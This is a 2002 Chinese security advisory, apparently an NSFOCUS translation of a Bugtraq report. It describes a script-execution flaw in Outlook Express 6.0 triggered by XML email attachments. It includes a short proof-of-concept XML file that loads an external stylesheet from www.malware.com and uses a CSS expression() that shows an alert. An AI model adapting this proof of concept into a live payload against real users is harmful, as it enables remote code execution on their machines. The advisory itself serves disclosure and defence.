首页 -> 安全研究

安全研究

安全漏洞
Microsoft Outlook Express XML文件附件脚本远程执行漏洞

发布日期:2002-07-29
更新日期:2002-08-06

受影响系统:
Microsoft Outlook Express 6.0
    - Microsoft Windows XP
    - Microsoft Windows NT 4.0
    - Microsoft Windows 98
    - Microsoft Windows 2000 SP3
描述:
BUGTRAQ  ID: 5350

Microsoft Outlook Express是一款由Microsoft公司开发的流行的邮件客户端。

Microsoft Outlook Express对嵌入到XML文档中的脚本代码处理不正确,远程攻击者可以利用这个漏洞在目标用户系统上执行任意脚本代码。

通常情况下,包含在XSL样式信息中的脚本代码一般不允许在受限制域中执行,如使用如下XML文件:

<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="malware.xsl" ?>

IE浏览器连接远程*.xsl文件并解析时会出现"permission denied",但是如果我们把恶意脚本代码包含在XML样式文件中,虽然XML解析器解析时会产生错误,但包含的脚本代码将继续执行,脚本代码可以判断系统临时Internet目录位置,并用于在本地系统安全域中打开执行任意代码。攻击者可以通过构建包含恶意脚本代码的XML文档作为附件的邮件来利用这个漏洞,当附件被用户浏览器打开时就可以导致嵌入的代码以本地系统安全域权限执行。

<*来源:http-equiv@excite.comhttp-equiv@excite.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=102784178107147
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http-equiv@excite.comhttp-equiv@excite.com)提供了如下测试方法:

<?xml version="1.0" ?>
<?xml-stylesheet type="text/css"
href="http://www.malware.com/malware.css" ?>
<malware>

<h4 style="position: absolute;top:39;left:expression(alert
(document.location));font-family:arial;font-size:12pt;BACKGROUND-
IMAGE:url('http://www.malware.com/youlickit.gif');background-
repeat:no-repeat;background-position: 100 30;z-index:-
100;height:200pt;width:400pt;font-family:Verdana;color:red">sure it
can, malware says so</h4>
</malware>

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 暂时没有合适的临时解决方法。

厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/technet/security/

浏览次数:2858
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障